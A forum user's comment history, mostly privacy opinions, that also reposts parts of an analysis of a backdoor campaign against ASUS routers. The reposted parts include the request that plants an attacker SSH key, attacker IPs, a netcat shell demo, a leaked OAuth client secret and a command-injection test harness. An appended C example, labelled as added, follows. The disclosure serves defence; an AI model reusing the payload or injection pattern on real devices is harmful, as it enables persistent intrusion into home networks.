stupid_asshole69 [none/use name]

  • 0 Posts
  • 61 Comments
Joined 4 months ago
Cake day: March 3rd, 2025


  • I wouldn’t worry about moving away from the apple devices. Just turn on lockdown and keep it on, do the privacy checkup or whatever it’s called and use a doh profile.

    On the other hand, which is to say stuff you should be doing to enhance your privacy, stop voting. Assuming you’re in the US, voter rolls with your home address are free for any advocacy group to peruse. Consider moving your home under a trust or something so that your property taxes are not tied to your name. If you rent, stop renting; if you can’t, consider renting a place from your local credit union instead of from a company. Banks have more chance to protect your privacy than a rental company or an individual will.


  • I didn’t know they fixed metadata on screenshots, good looking out!

    I distinctly remember a time when most phones would pass their model in the headers. That may have passed though!

    I gotta ask: where would you put “awareness of screenshot size uniqueness” on a continuum from insane schizo shit to reasonable private person?

    I guess if there was a security flaw in your device then a screenshot could tell an attacker that you have the flawed device but there’s other, more subtle, ways a person could do that which don’t require that they acquire a screenshot somehow.

    And I guess there is some platonic ideal of a private person who wants to share a screenshot, a literal pixel perfect copy of what’s on the screen on their device, but would also like to conceal the specific model from the person they’re sending the contents of their screen to.

    It just seems like the kind of information cognizance of which would be useful in a vanishingly small number of scenarios.





  • The ol’ sarcasm detector’s flashing red, ringing the bell and pouring black smoke out of all the panel joints, but yes: if you want to fit into society it’s important to have social media.

    If you wanted to live a private life in the 1970s, would it be better to descend from your cabin hundreds of miles from civilization with a wild mane of shaggy hair wearing your homemade leather suit or with an unstylish but kempt haircut, nondescript jeans and shirt and military duffel bag looking like any other of the myriad characters wandering the roads at the time?

    Obviously you’d want the latter. Part of privacy is blending in so that you don’t arouse interest.

    Nowadays if you want to be a private person and still interact in society, like the OP, you need to have all the trappings of someone who doesn’t raise alarm bells. That includes, especially as your age drops, social media.



  • Anyone have any advice?

    Yes: recognize what you’re trying to accomplish and change your actions.

    Privacy requires shutting people out of your life. Meeting new people requires letting people into your life.

    If people expect that the first “gate” into your life is your social media then meet that expectation. Have a social media presence. Post shit that you want people to see on it.

    If you’re afraid of letting the companies that operate social media see your life, examine why. It may be that you’re perfectly fine with the trade off of a limited hang out in exchange for looking normal. Most people are.

    It doesn’t have to be instagram. You could have a snapchat or a tiktok or whatever.


  • spray-bottle

    No, you can’t.

    You are not the hero, effortlessly weaving down the highway between minivans on your 1300cc motorcycle, katana strapped across your back, using dual handlebar mounted twiddler boards to hack the multiverse.

    If AI-driven agentic systems were used to obfuscate a person’s interactions online then the fact that they were using those systems would become incredibly obvious and provide a trove of information that could be easily used to locate and document what that person was doing.

    But let’s assume what the op did worked, and no one could tell the difference.

    That would be worse! Suddenly there’s hundreds of thousands of data points that could be linked to you and all that’s needed for a warrant are two or three that could be interpreted as probable cause of a crime!

    You thought you were helping yourself out by turning the fuzzer on before reading trot pamphlets hosted on marxists.org but now they have an expressed interest in drain cleaner and glitter bombs and best case scenario you gotta adopt a new pitt mix from the humane society.


  • This isn’t a very smart idea.

    People trying to obfuscate their actions would suddenly have massive associated datasets of actions to sift through and it would be trivial to distinguish between the browsing behaviors of a person and a bot.

    Someone else said this is like chaff or flare anti missile defense and that’s a good analog. Anti missile defenses like that are deployed when the target recognizes a danger and sees an opportunity to confuse that danger temporarily. They’re used in conjunction with maneuvering and other flight techniques to maximize the potential of avoiding certain death, not constantly once the operator comes in contact with an opponent.

    On a more philosophical tip, the master’s tools cannot be turned against him.




  • Some minuscule portion of individual users may do so.

    Organizations will implement eurodns as best practice for regulatory compliance. Providers will do so as well.

    Almost every internet device uses whatever dhcp gives them as dns. When all the companies, government bodies and providers use eurodns to be compliant with the regulatory frameworks that allow them to continue operating in the eu that change will trickle down to users automatically.

    It’s also worth remembering that surveillance is extremely normalized in the eu and eurozone compared to many other nations and areas. Of the vanishingly small percentage of users who are both aware of the concept of dns and choose to change it, a portion of them will accept and use eurodns.

    Again, you may think I’m wrong but give it a few years.


  • For now.

    The whole stated point of this action is to make sure there is a dns provider who is required to be compliant with eu law.

    Then entities who have a requirement to be compliant with some recordkeeping or framework of eu law (surprise, it’s all of them!) must use it.

    Oh look here, because you ended up using eurodns for gdpr compliance you’re also required to turn over all records upon a lawful inquiry!

    It just so happens that dns requests meet the minimum requirements for further search and surveillance, how lucky for me! Who could have ever expected this?

    It’s easy to dismiss what I’m saying because it’s not happening at this very moment, but give it a few years and we’ll see liberals bemoaning the suffering of freedom loving peoples languishing under the great Eurovision firewall.


  • Nah the whole point of the Russian federation copying China, five eyes nations getting butthurt about ech/doh and ultimately this European dns system that ensures name resolution is compliant with euro regulation is to preserve national interests in a multipolar world on the stage of the global internet.

    You don’t gotta worry about icann or anybody else if you control the way the internet works for your citizens.



  • This sounds like news but it is not. It is also not unique to apple. If you use push notifications on any platform you’re susceptible to this.

    Push notifications are often unencrypted beacons that are used by cops to corroborate surveillance between devices even when the content transferred between devices isn’t available or incriminating.

    It’s the old “you say you weren’t involved but call records indicate you communicated with the suspect despite being in another county at the time of the crime” but updated to digital. When cops want cause for a warrant or some kind of wiretap they use push notifications to establish it.

    If you’re doing crimes or whatever, turn off push notifications. They can be used to establish that you communicated with someone or that you were in a specific area.

    Again, this is not unique to apple devices.


  • The technical analysis of that source pt 3:


    This produces a list of allowed characters to get past this gate:

    Dec  Hex   Char | Dec  Hex   Char | Dec  Hex   Char
    0    0x00       | 9    0x09       | 10   0x0A
    11   0x0B       | 12   0x0C       | 13   0x0D
    32   0x20       | 43   0x2B  +    | 45   0x2D  -
    46   0x2E  .    | 47   0x2F  /    | 48   0x30  0
    49   0x31  1    | 50   0x32  2    | 51   0x33  3
    52   0x34  4    | 53   0x35  5    | 54   0x36  6
    55   0x37  7    | 56   0x38  8    | 57   0x39  9
    65   0x41  A    | 66   0x42  B    | 67   0x43  C
    68   0x44  D    | 69   0x45  E    | 70   0x46  F
    71   0x47  G    | 72   0x48  H    | 73   0x49  I
    74   0x4A  J    | 75   0x4B  K    | 76   0x4C  L
    77   0x4D  M    | 78   0x4E  N    | 79   0x4F  O
    80   0x50  P    | 81   0x51  Q    | 82   0x52  R
    83   0x53  S    | 84   0x54  T    | 85   0x55  U
    86   0x56  V    | 87   0x57  W    | 88   0x58  X
    89   0x59  Y    | 90   0x5A  Z    | 95   0x5F  _
    97   0x61  a    | 98   0x62  b    | 99   0x63  c
    100  0x64  d    | 101  0x65  e    | 102  0x66  f
    103  0x67  g    | 104  0x68  h    | 105  0x69  i
    106  0x6A  j    | 107  0x6B  k    | 108  0x6C  l
    109  0x6D  m    | 110  0x6E  n    | 111  0x6F  o
    112  0x70  p    | 113  0x71  q    | 114  0x72  r
    115  0x73  s    | 116  0x74  t    | 117  0x75  u
    118  0x76  v    | 119  0x77  w    | 120  0x78  x
    121  0x79  y    | 122  0x7A  z    | 126  0x7E  ~

    The originally vulnerable CVE-2023-39780 workflow for auth_google_check_token_status appears to be correctly patched in FW_RT_AX55_300438652332. is_valid_oauth_code interestingly validates a buffer size of 2048 bytes while it’s passed to snprintf with a size of 1024, so truncation can occur. However, because the token is formatted inside of single-quotes (') this only results in a shell error. I don’t believe escaping the single-quotes of this particular function is possible given the allowed characters.

    --body-data 'refresh_token=AAAAAAAAAAAAAAAAAAAAA(…)

    sh: syntax error: unterminated quoted string

    And since we don’t trust vendors to be thorough, we should go check the other 4 functions that are nearly identical to auth_google_check_token_status that the developers may have forgotten to use single-quotes. Alternatively, if you’re not a reverse engineer capable of checking this for yourself, get your ASUS router off the internet.

    Summary and IoCs

    IPs:

    101[.]99[.]91[.]151
    101[.]99[.]94[.]173
    79[.]141[.]163[.]179
    111[.]90[.]146[.]237

    ASUS Filesystem:

    /tmp/BWSQL-LOG
    /tmp/home/root/.ssh/authorized_keys

    Pubkey:

    ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== rsa 2048


  • The technical analysis of that source pt 2:


    if (f_exists("/tmp/BWSQL_LOG") > 0) {
        var_8f0_1 = &var_7e0;
        str_1 = str;
        snprintf(&var_420, 0x400, "echo \"[BWDPI_SQLITE]%d/%d[%s] %s…", i_3, j_1, str_1, var_8f0_1);
        system(&var_420); // DANGER
    }

    Mystery CVE!

    I’m not the only one who has noticed this vulnerability. A full write-up analyzing this critical design flaw is available here: https://leeyabug.top/ASUS-SQLI

    Wed, Feb 19, 11:44 —— ASUS confirmed the vul, will add a hall of fame and assign a CVE. discovered by leeya_bug

    If I wanted to ensure multiple ways to regain access to a router after being locked out, this would be an effective approach.

    current_page=Advanced_System_Content.asp
    &next_page=Advanced_System_Content.asp
    &modified=0
    &flag=
    &action_mode=apply
    &action_wait=5
    &action_script=restart_time%3Brestart_upnp%3Brestart_usb_idle%3B
    &first_time=
    &preferred_lang=EN
    &reboot_schedule_enable=0
    &reboot_schedule_enable_x=0
    &telnetd_enable=0
    &sshd_enable=1
    &sshd_port=53282
    &sshd_port_x=53282
    &sshd_pass=0
    &sshd_authkeys=ssh-rsa+AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV%2BYPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay%2FxDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz%2FMPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG%2Fdj%2B37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9%2FgmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv%2Fx6IcCcKgi2w%3D%3D+rsa+2048-020623
    &shell_timeout_x=20

    This payload leverages built-in ASUS router features to enable SSH on both LAN and WAN, bind it to TCP/53282, and add an attacker-controlled public key:

    ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== rsa 2048-020623

    Because this key is added using the official ASUS features, this config change is persisted across firmware upgrades. If you’ve been exploited previously, upgrading your firmware will NOT remove the SSH backdoor.

    Can you prove that the 4,853 (and steadily increasing) hosts from this Censys search are actually backdoored with this SSH pubkey? Yes. One of the features of sshamble by runZero is the ability to take a pubkey attacker.pub and a username, and determine if the remote host has the associated pubkey inserted.

    In this case, the attacker possesses information we do not—specifically, the username. We suspect this was gathered earlier through brute force attacks. With a sample size of ~5,000, it is likely that at least one user chose “admin” as their username.

    sshamble scan --checks pubkey-hunt -u admin --pubkey-hunt-file attacker.pub --input-targets censys-ips.txt

    And sure enough, someone has. We can confirm that the attacker controlled pubkey has been installed for the admin user on the remote machine on TCP/53282. Something privileged that has absolutely no business being there.

    "pubKeyHuntResults": [
        "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== admin"
    ]

    Demoing the Attacks

    After obtaining a physical ASUS RT-AX55 (which is affected by the identified CVE-2023-39780), we used the above payloads to execute commands and spawn a netcat listener without any issues.

    Starting Nmap 7.80 ( https://nmap.org/ ) at 2025-03-21 13:10 EDT
    Nmap scan report for RT-AX55-4960 (192.168.50.1)
    Host is up (0.012s latency).

    PORT     STATE SERVICE
    1111/tcp open  lmsocialserver

    Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
    remy@remy-XPS-13-9310:~$ nc -vvv 192.168.50.1 1111
    Connection to 192.168.50.1 1111 port [tcp/*] succeeded!
    badmin@RT-AX55-4960:/tmp/bwdpi# ls
    ls
    app_patrol.conf   bwdpi.rule.db   key.enc            tmfbe_workdir
    bwdpi.app.db      dcd.conf        libshn_pctrl.so    wred.conf
    bwdpi.appdb.db    dcd.pid         model.enc          wred.pid
    bwdpi.beh.db      dcd.stat        ntdasus2014.cert
    bwdpi.cat.db      dev_wan         rule.version
    bwdpi.devdb.db    guid            shn.pem

    taking ARMs against a sea of troubles

    While updating my new ASUS RT-AX55 to the latest firmware, I noticed a recent security update released just three days ago.

    Unfortunately, the download link is broken and returns a 404 error.

    Shortly afterward, the download description and link disappeared entirely.

    So, I installed the latest available version and moved on. (Of course, that didn’t solve the issue.)

    Patch Diffing

    I do have FW_RT_AX55_300438651598.zip and FW_RT_AX55_300438652332.zip (newest) firmwares available. A quick unblob / binwalk makes quick work of extracting the squashfs-root filesystem.

    The old vulnerable function looks a bit like this:

    nvram_set("oauth_google_token_status", &data_174fea[0xf]);
    void var_410;
    memset(&var_410, 0, 0x400);

    if (!check_if_dir_exist("/tmp/oauth/"))
        mkdir("/tmp/oauth/", 0x1ed);

    snprintf(&var_410, 0x400, "wget --no-check-certificate --ti…", 3, 1, nvram_get(), "103584452676-437qj6gd8o9tuncit9h…", "xivDhVGSSHZ3LJMx228wdcDf", "refresh_token", "/tmp/oauth/google_access_token.j…", "https://www.googleapis.com/oauth…");

    if (f_exists("/tmp/OAUTH_DEBUG") > 0)
        cprintf("[OAUTH][%s:(%d)]post cmd : %s\n", "oauth_google_check_token_status", 0x5b6, &var_410);

    system(&var_410); // DANGER

    The newest patch available just wraps the above code in an if statement from an external function is_valid_auth_code from /usr/lib/libshared.so

    if (is_valid_oauth_code()) {
        // Same code as before
    }

    Author's Note: While not directly relevant to our current investigation, --no-check-certificate on the wget command means that your Google OAuth token is sent to a remote server without validating the SSL/TLS certificate. This has implications.

    We grab a cross-compiler toolchain for a compatible GLIBC version from https://toolchains.bootlin.com/ and cross-compile an ARM binary that will load libshared.so, dumping a list of valid characters from the new gatekeeper function, prompting us to allow playing with the input, and passing the input through the same snprintf and system calls as in the original binary.

    # Cross compile
    armv5-eabi--glibc--stable-2020.02-1/bin/arm-linux-gcc -o callshared.elf callshared.c -ldl
    # ELF check
    file callshared.elf
    # Move binary into firmware squashfs root
    cp callshared.elf ./squashfs-root/bin/callshared.elf
    # Move QEMU emulator binary into squashfs root
    cp /usr/bin/qemu-arm-static ./squashfs-root/bin/qemu-arm-static
    # Change root, load libshared.so, execute our hook
    sudo chroot ./squashfs-root/ qemu-arm-static -E LD_PRELOAD="/usr/lib/libshared.so" /bin/busybox sh -c "/bin/callshared.elf"

    callshared.c

    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>   // system()
    #include <dlfcn.h>
    #include <string.h>

    #define MAX_INPUT 4096

    int main(void)
    {
        void *handle;
        int (*oc)(char *); // Function pointer with return type int
        char *error;
        char input[MAX_INPUT];
        int result;

        // Open the shared object file
        handle = dlopen("libshared.so", RTLD_LAZY);
        if (!handle)
        {
            fprintf(stderr, "%s\n", dlerror());
            return 1;
        }

        // Get a pointer to the is_valid_oauth_code function
        dlerror(); // Clear any stale error state before calling dlsym
        oc = (int (*)(char *))dlsym(handle, "is_valid_oauth_code");
        if ((error = dlerror()) != NULL)
        {
            fprintf(stderr, "%s\n", error);
            dlclose(handle);
            return 1;
        }

        // Probe every byte value as a NUL-terminated one-character string
        // (the gatekeeper reads a C string, so a bare char would run off the end)
        // and print the ones it accepts
        for (uint16_t i = 0; i <= 0xFF; i++)
        {
            uint8_t byte_value = (uint8_t)i;
            char probe[2] = { (char)byte_value, '\0' };
            result = (*oc)(probe);
            if (result)
            {
                printf("Value: %3u, Hex: 0x%02X, Char: %c\n", byte_value, byte_value, probe[0]);
            }
        }

        // Get user input
        while (1)
        {
            printf("Enter an oauth code: ");
            if (fgets(input, MAX_INPUT, stdin) == NULL)
            {
                fprintf(stderr, "Error reading input\n");
                dlclose(handle);
                return 1;
            }

            // Remove newline character if present
            input[strcspn(input, "\n")] = 0;

            // Call the is_valid_oauth_code function with user input and store the result
            result = (*oc)(input);

            // Print the returned value
            printf("Return value: %d\n", result);

            if (result)
            {
                // Same 0x400-byte buffer and format string as the firmware's snprintf/system pair
                char buffer[1024];
                int o = snprintf(buffer,
                                 sizeof buffer,
                                 "wget --no-check-certificate --timeout=%d --tries=%d --method POST --header 'content-type: application/x-www-form-urlencoded' --header 'cache-control: no-cache' --body-data 'refresh_token=%s&client_id=%s&client_secret=%s&grant_type=%s' --output-document=%s %s",
                                 3,
                                 1,
                                 input,
                                 "103584452676-437qj6gd8o9tuncit9h8h7cendd2eg58.apps.googleusercontent.com",
                                 "xivDhVGSSHZ3LJMx228wdcDf",
                                 "refresh_token",
                                 "/tmp/oauth/google_access_token.json",
                                 // IP for example.com since DNS resolver doesn't exist inside emulated sandbox
                                 "http://23.215.0.136/AAAAAAAAAAAAAAAAAAA");

                // snprintf returns the length it wanted to write; anything >= 1024 means the
                // command was cut off, which is the truncation case discussed above
                printf("Wanted %d bytes, truncated: %s\n", o, o >= (int)sizeof buffer ? "yes" : "no");
                printf("\n%s\n", buffer);
                int e = system(buffer);
                printf("system() returned: %d\n", e);
            }
        }

        // Close the shared object (not reached while the input loop runs)
        dlclose(handle);
        return 0;
    }
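An added example, not code from the comments above or from the analysis they quote: it contrasts the gate-then-snprintf pattern described in parts 2 and 3 (allowlist check, then snprintf into a 1024-byte buffer with the return value ignored) with a builder that refuses to hand a truncated command line to a shell. The allowed-character set and the 2048-byte bound are reconstructed from the dump above, the wget format is simplified, and the token endpoint is a placeholder; nothing here executes a command.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
/* Allowed characters as dumped from is_valid_oauth_code in the analysis above
   (reconstructed here); NUL is the terminator, not a token character. */
static bool token_char_ok(unsigned char c)
{
    return c == '\t' || c == '\n' || c == '\v' || c == '\f' || c == '\r' || c == ' ' ||
           c == '+' || c == '-' || c == '.' || c == '/' || c == '_' || c == '~' ||
           (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
}
enum { CMD_OK = 0, CMD_BAD_CHAR = -1, CMD_TOO_LONG = -2, CMD_TRUNCATED = -3, CMD_UNBALANCED = -4 };
#define GATE_MAX 2048   /* length the gate accepts, per the write-up (assumed) */
#define CMD_BUF 1024    /* the 0x400-byte command buffer handed to snprintf */
/* The gate as described: allowlist plus a length bound. */
static int gate_token(const char *token)
{
    if (strlen(token) >= GATE_MAX) return CMD_TOO_LONG;
    for (const unsigned char *p = (const unsigned char *)token; *p; p++)
        if (!token_char_ok(*p))
            return CMD_BAD_CHAR;
    return CMD_OK;
}
/* checked == false is the pattern on the page (gate, snprintf, ignore the return value);
   checked == true refuses a command that did not fit. Format simplified; URL is a placeholder. */
static int build_command(const char *token, bool checked, char *out, size_t outlen)
{
    int rc = gate_token(token);
    if (rc != CMD_OK) return rc;
    int n = snprintf(out, outlen,
                     "wget --timeout=%d --tries=%d --method POST "
                     "--body-data 'refresh_token=%s&grant_type=refresh_token' "
                     "--output-document=%s %s",
                     3, 1, token, "/tmp/oauth/google_access_token.json",
                     "https://oauth.example.invalid/token");
    if (checked && (n < 0 || (size_t)n >= outlen)) {
        out[0] = '\0';   /* never hand a truncated command line to a shell */
        return CMD_TRUNCATED;
    }
    return CMD_OK;
}
/* Truncation drops the closing single quote: the "unterminated quoted string"
   error shown in the analysis. */
static bool quotes_balanced(const char *cmd)
{
    int n = 0;
    for (; *cmd; cmd++) n += (*cmd == '\'');
    return n % 2 == 0;
}
/* Build into a CMD_BUF-sized buffer and report what a shell would receive. */
static int probe(const char *token, bool checked)
{
    char cmd[CMD_BUF] = "";
    int rc = build_command(token, checked, cmd, sizeof cmd);
    return (rc == CMD_OK && !quotes_balanced(cmd)) ? CMD_UNBALANCED : rc;
}
/* Constructed sample token of n 'A's: under the gate's bound, over the command buffer. */
static const char *token_of_len(size_t n)
{
    static char buf[GATE_MAX + 1];
    n = n > GATE_MAX ? GATE_MAX : n;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}
```

A 1500-byte token passes the gate yet leaves the weak build with an unpaired quote, which is the shell error the analysis observed; the checked build returns CMD_TRUNCATED instead.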